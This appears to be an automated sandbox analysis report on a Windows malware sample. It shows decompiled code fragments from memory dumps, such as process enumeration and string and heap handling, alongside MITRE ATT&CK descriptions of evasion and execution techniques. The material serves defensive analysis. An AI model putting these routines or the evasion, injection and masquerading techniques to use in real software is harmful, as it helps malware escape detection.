0x0477197f
0x04771981
0x0477198c
0x04771990
0x04771995
0x04771999
0x047719a1
0x047719a6
0x047719ae
0x047719ae
0x047719b7
0x047719bb
0x047719c1
0x047719c4
0x047719ca
0x047719ca
0x047719d2
0x047719d2
0x047719d9
0x047719d9
0x047719e4

APIs

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

Part of subcall function 0477756E: wsprintfA.USER32 ref: 047775CA

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,04773EC5,74666F53,00000000,?,00000000,?,?,04772F4F), ref: 047719A6
lstrcpy.KERNEL32(00000000,00000000), ref: 047719CA
lstrcat.KERNEL32(00000000,00000000), ref: 047719D2

Strings

Soft, xrefs: 0477197C, 04771995

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 65b828ffe50e3048b6c2e1cb2b03dbcc8344dc99e944e564622b1b51c33c7c80
Instruction ID: 68010239b02df0a8bfcee301d193305afdd4030554dec62bebfda2a03be116d1
Opcode Fuzzy Hash: 65b828ffe50e3048b6c2e1cb2b03dbcc8344dc99e944e564622b1b51c33c7c80
Instruction Fuzzy Hash: E001F27210024AB7EF222B658C88AEE3BADEF80248F844025F90455305DB38A946C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 047719E7, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E047719E7() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x477a2d0; // 0x96d5a8
						_t2 = _t9 + 0x477be04; // 0x73617661
						_push( &_v264);
						if( *0x477a11c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x047719f2
0x047719fc
0x04771a00
0x04771a0a
0x04771a3b
0x04771a11
0x04771a16
0x04771a23
0x04771a2c
0x04771a43
0x04771a2e
0x04771a36
0x00000000
0x04771a36
0x04771a44
0x04771a45
0x00000000
0x04771a45
0x00000000
0x04771a3f
0x04771a4b
0x04771a50

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047719F7
Process32First.KERNEL32(00000000,?), ref: 04771A0A
Process32Next.KERNEL32(00000000,?), ref: 04771A36
CloseHandle.KERNEL32(00000000), ref: 04771A45

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5373571b050dc4b470f7377a33fb5f404abbbbfc491ca05207356e85cab72859
Instruction ID: bcbedbcd3c1b3932ff4ce455631a7777fdce327c790e1a3ae4b8afcd47f00444
Opcode Fuzzy Hash: 5373571b050dc4b470f7377a33fb5f404abbbbfc491ca05207356e85cab72859
Instruction Fuzzy Hash: BBF096726011146AEB30A6769C48EDB77BCEBC5314FC10561E905D2300EA24EA45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 04776027, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E04776027(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x477a37c; // 0x50e9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x477a37c; // 0x50e9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x477a030) {
					HeapFree( *0x477a290, 0, _t8);
				}
				_t14[1] = E047749BA(_v0, _t14);
				_t11 =  *0x477a37c; // 0x50e9630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x04776027
0x04776027
0x04776030
0x04776040
0x04776040
0x04776045
0x0477604a
0x00000000
0x00000000
0x0477603a
0x0477603a
0x0477604c
0x04776050
0x04776062
0x04776062
0x04776072
0x04776075
0x0477607a
0x0477607e
0x04776084

APIs

RtlEnterCriticalSection.NTDLL(050E95F0), ref: 04776030
Sleep.KERNEL32(0000000A,?,?,04772F44,?,?,?,?,?,047744F9,?,00000001), ref: 0477603A
HeapFree.KERNEL32(00000000,00000000,?,?,04772F44,?,?,?,?,?,047744F9,?,00000001), ref: 04776062
RtlLeaveCriticalSection.NTDLL(050E95F0), ref: 0477607E

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 42423ec10be3d7deeb3c8cf9fd54f28c0df8e9dff503ffb88b6afd4590c0b1c5
Instruction ID: e91fc248b5100a7dc05c38fa0277c9a4f1ce377523091c736ac0a146a55399fc
Opcode Fuzzy Hash: 42423ec10be3d7deeb3c8cf9fd54f28c0df8e9dff503ffb88b6afd4590c0b1c5
Instruction Fuzzy Hash: 10F0F8B0211641DBFB209F39E988F9A77A4EB06755B84C805FA49D6345C638FC04CB25

Uniqueness

Uniqueness Score: -1.00%

Function 04771547, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04771547() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x477a2c4; // 0x2e8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x477a304; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x477a2c4; // 0x2e8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x477a290; // 0x4cf0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x04771547
0x0477154e
0x04771598
0x0477159a
0x0477159a
0x04771552
0x04771558
0x0477155d
0x04771561
0x04771567
0x0477156e
0x00000000
0x00000000
0x04771570
0x04771575
0x00000000
0x00000000
0x00000000
0x04771575
0x04771577
0x0477157f
0x04771582
0x04771582
0x04771588
0x0477158f
0x04771592
0x04771592
0x00000000

APIs

SetEvent.KERNEL32(000002E8,00000001,04774214), ref: 04771552
SleepEx.KERNEL32(00000064,00000001), ref: 04771561
CloseHandle.KERNEL32(000002E8), ref: 04771582
HeapDestroy.KERNEL32(04CF0000), ref: 04771592

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 9cf809a2d5376e2516d2ea2355021ccffe50a4604a8b2db6003795725be01c8e
Instruction ID: 9d3a332ef60f07d2e7c15175f2967b71be89de5424ae78469f2523e9db2b70e1
Opcode Fuzzy Hash: 9cf809a2d5376e2516d2ea2355021ccffe50a4604a8b2db6003795725be01c8e
Instruction Fuzzy Hash: F4F030F1B513129BFB245A34A90DB9E37ADEB157117C44914BA1AE3380DA2CED00C750

Uniqueness

Uniqueness Score: -1.00%

Function 0477461D, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0477461D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x477a37c; // 0x50e9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x477a37c; // 0x50e9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x477a37c; // 0x50e9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x477b882) {
					HeapFree( *0x477a290, 0, _t10);
					_t7 =  *0x477a37c; // 0x50e9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x0477461d
0x04774626
0x04774636
0x04774636
0x0477463b
0x04774640
0x00000000
0x00000000
0x04774630
0x04774630
0x04774642
0x04774647
0x0477464b
0x0477465e
0x04774664
0x04774664
0x0477466d
0x0477466f
0x04774673
0x04774679

APIs

RtlEnterCriticalSection.NTDLL(050E95F0), ref: 04774626
Sleep.KERNEL32(0000000A,?,?,04772F44,?,?,?,?,?,047744F9,?,00000001), ref: 04774630
HeapFree.KERNEL32(00000000,?,?,?,04772F44,?,?,?,?,?,047744F9,?,00000001), ref: 0477465E
RtlLeaveCriticalSection.NTDLL(050E95F0), ref: 04774673

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: e03c29ad1300c38381552dce2f8392de70eda502945edc0d2ada8b4d8bf19a21
Instruction ID: 35a0568cf89b1262156dd58e52859b7148b0627efd5e0c02d8bd410611ff2365
Opcode Fuzzy Hash: e03c29ad1300c38381552dce2f8392de70eda502945edc0d2ada8b4d8bf19a21
Instruction Fuzzy Hash: 2BF0D4B8611201EBFB188F24E899EA977A4EB4A715B84C459EA0AD7350D638AC00CE15

Uniqueness

Uniqueness Score: -1.00%

Function 6C53FA10, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C53FA62

Part of subcall function 6C53EF40: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C53EFD0

Strings

string too long, xrefs: 6C53FAAE, 6C53FB66

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memmove
String ID: string too long
API String ID: 2765667529-2556327735
Opcode ID: d1dfbec92bbc0398621f87c904040bceccc825110e91f1c3f8b92d78891c23d7
Instruction ID: f5f993bfe883df6dd9dd239aa8261ceedf3f5cc493c57bde823f956cb2d9164e
Opcode Fuzzy Hash: d1dfbec92bbc0398621f87c904040bceccc825110e91f1c3f8b92d78891c23d7
Instruction Fuzzy Hash: 695106722083609FD3218E3DEC90B5BB7D6EFD1310F195EAAD4D9C7A91E724984C8762

Uniqueness

Uniqueness Score: -1.00%

Function 6C5408B0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

string too long, xrefs: 6C5409B9, 6C540A54, 6C540A5E, 6C540B5A
invalid string position, xrefs: 6C5409A5, 6C5409AF

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID:
String ID: invalid string position$string too long
API String ID: 0-4289949731
Opcode ID: 524c60021ca962799126eaae91a095278baf5a130ce9eba461c51c3811d6d5ba
Instruction ID: c795425772d4481170a3156d10eee275040ecbde49d1507ff864223a7b335452
Opcode Fuzzy Hash: 524c60021ca962799126eaae91a095278baf5a130ce9eba461c51c3811d6d5ba
Instruction Fuzzy Hash: 0031F6323057619B8624DE5DDC8885FB3EAEFE5755730892FE555C3E90EB309C088BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C5407B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C54086A

Strings

string too long, xrefs: 6C54079A, 6C540897, 6C5409B9, 6C540A5E
invalid string position, xrefs: 6C540790, 6C5409AF

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b7b5f162b90642889a6209c69e13d6a9297e776269b5f9f81b4d98c7deec6292
Instruction ID: 6b489546f67fcc1e528ea1aaf8e65faa681cc96b19b8ea28819d814c21bc4a01
Opcode Fuzzy Hash: b7b5f162b90642889a6209c69e13d6a9297e776269b5f9f81b4d98c7deec6292
Instruction Fuzzy Hash: 5811BE312016809BD7348E9C9D90D1AB7FAEFE17157308D1FE59187E81DB61EC448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C544A78, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6C54DDE3
___raise_securityfailure.LIBCMT ref: 6C54DECA

Strings

8hQl, xrefs: 6C54DDD8

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8hQl
API String ID: 3761405300-3048985772
Opcode ID: ef53a2b7657f4b655895a3a78bb7472b7c98dd9402d7afc43a5d067174e2e70f
Instruction ID: 309a96cdf358faca62b396b71d52472f38f5d85a840db38bbd76cbfcf8851ae1
Opcode Fuzzy Hash: ef53a2b7657f4b655895a3a78bb7472b7c98dd9402d7afc43a5d067174e2e70f
Instruction Fuzzy Hash: 9B2115B4600289DFEF00CF1DD9867A07BF8FB4A756F12412AE9098BBA0E7B15484CF45

Uniqueness

Uniqueness Score: -1.00%

Function 6C5404E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C540507

Part of subcall function 6C543E01: _malloc.LIBCMT ref: 6C543E19

Strings

string too long, xrefs: 6C5405B4, 6C54079A
invalid string position, xrefs: 6C540790

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
String ID: invalid string position$string too long
API String ID: 657562460-4289949731
Opcode ID: b4c67513bb4f64c3f1371a02bfb47edf8ad6f364b48eb7a164900fac0ccf0e54
Instruction ID: 7db93f48d6cf20c6cfe000af4f046df2468a94e9eacf95f9d4b19c1418d6e885
Opcode Fuzzy Hash: b4c67513bb4f64c3f1371a02bfb47edf8ad6f364b48eb7a164900fac0ccf0e54
Instruction Fuzzy Hash: 6FD09B75701145866B1C45B44C159AF5194CBA031DF3489399627CAE91D725E8544157

Uniqueness

Uniqueness Score: -1.00%

Function 6C54218A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6C54219D

Part of subcall function 6C544920: std::exception::_Copy_str.LIBCMT ref: 6C544939

__CxxThrowException@8.LIBCMT ref: 6C5421B2

Part of subcall function 6C544A87: RaiseException.KERNEL32(?,00000000,?,?,00000000), ref: 6C544ADC

Strings

|'Ql, xrefs: 6C542193, 6C5421A7

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: |'Ql
API String ID: 757275642-3658207547
Opcode ID: 0e9698cb43c8bea3b7929c31728d69c63b2cba2942c98ba2a553994ec8247d58
Instruction ID: 0606890895c61653aa72ed7b41f8e311aa37effed93cf402e43c53eb2694b090
Opcode Fuzzy Hash: 0e9698cb43c8bea3b7929c31728d69c63b2cba2942c98ba2a553994ec8247d58
Instruction Fuzzy Hash: 69D06775C0020DBB8B04EFA5DC899CEBBBCEA48244F40C466A914A7A01E734A6488F94

Uniqueness

Uniqueness Score: -1.00%

Function 04772FFC, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E04772FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04775C4E(_t2);
				if(_t34 != 0) {
					_t30 = E04775C4E(_t28);
					if(_t30 == 0) {
						E04772A03(_t34);
					} else {
						_t39 = _a4;
						_t22 = E047779AC(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E047779AC(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x04772ffc
0x04773006
0x04773008
0x0477300e
0x0477300e
0x04773017
0x0477301b
0x04773027
0x0477302b
0x0477309f
0x0477302d
0x0477302d
0x04773031
0x04773038
0x0477303b
0x04773055
0x04773044
0x04773044
0x04773048
0x0477304b
0x04773050
0x04773050
0x0477305a
0x04773082
0x04773088
0x0477308b
0x0477305c
0x0477305e
0x04773066
0x04773071
0x04773076
0x04773076
0x04773092
0x04773099
0x0477309a
0x0477309a
0x0477302b
0x047730aa

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,047756E5,00000000,00000000,00000000,050E9698,?,?,04773B82,?,050E9698), ref: 04773008

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

Part of subcall function 047779AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04773036,00000000,00000001,00000001,?,?,047756E5,00000000,00000000,00000000,050E9698), ref: 047779BA
Part of subcall function 047779AC: StrChrA.SHLWAPI(?,0000003F,?,?,047756E5,00000000,00000000,00000000,050E9698,?,?,04773B82,?,050E9698,0000EA60,?), ref: 047779C4

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047756E5,00000000,00000000,00000000,050E9698,?,?,04773B82), ref: 04773066
lstrcpy.KERNEL32(00000000,00000000), ref: 04773076
lstrcpy.KERNEL32(00000000,00000000), ref: 04773082

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 33efe1cf349fb10658b0a682dc6a14e4d8a801d1910a80340098f8d6f6c7f45c
Instruction ID: b6ae26258e462d67da0f550130ac632341a92ae2048a77adf2143d26482586cb
Opcode Fuzzy Hash: 33efe1cf349fb10658b0a682dc6a14e4d8a801d1910a80340098f8d6f6c7f45c
Instruction Fuzzy Hash: 2D21D2B2600215BFDF215F75CC48EAA7FB9EF06284B858454FD049B311D735E900D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04774DC8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04774DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04775C4E(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x04774ddd
0x04774de1
0x04774deb
0x04774df2
0x04774df5
0x04774df7
0x04774dff
0x04774e04
0x04774e12
0x04774e17
0x04774e21

APIs

lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,050E932C,?,04774ABB,004F0053,050E932C,?,?,?,?,?,?,04771BD5), ref: 04774DD8
lstrlenW.KERNEL32(04774ABB,?,04774ABB,004F0053,050E932C,?,?,?,?,?,?,04771BD5), ref: 04774DDF

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,04774ABB,004F0053,050E932C,?,?,?,?,?,?,04771BD5), ref: 04774DFF
memcpy.NTDLL(73B769A0,04774ABB,00000002,00000000,004F0053,73B769A0,?,?,04774ABB,004F0053,050E932C), ref: 04774E12

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: eee8f5c202d9d50db50dddf3e0193d0406aa6be199b8d7ec64e935faf61b2057
Instruction ID: 1b6ed82b1f4bbb7be5f62d443a13a23c034ba43162a85e1184b2f3f65803ecde
Opcode Fuzzy Hash: eee8f5c202d9d50db50dddf3e0193d0406aa6be199b8d7ec64e935faf61b2057
Instruction Fuzzy Hash: 6BF0FF76900119BFDF11DFA9CC48CDE7BACEF092587554466ED04D7201E771EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04772829, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(050E887A,00000000,00000000,00000000,04776328,00000000), ref: 04772839
lstrlen.KERNEL32(?), ref: 04772841

Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A

lstrcpy.KERNEL32(00000000,050E887A), ref: 04772855
lstrcat.KERNEL32(00000000,?), ref: 04772860

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: be5b34c06695523fa4be34c030bad7cfaa15050514fef4103729aa1970373a2f
Instruction ID: 0ba2d2a71e5bc2fea1501df758d2565454b6b2abb053855d61589c5067db4e44
Opcode Fuzzy Hash: be5b34c06695523fa4be34c030bad7cfaa15050514fef4103729aa1970373a2f
Instruction Fuzzy Hash: 2EE092B39022226797115FA59C48CDFBBBCEF89651344481AFA00D3200C7289C05CBA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

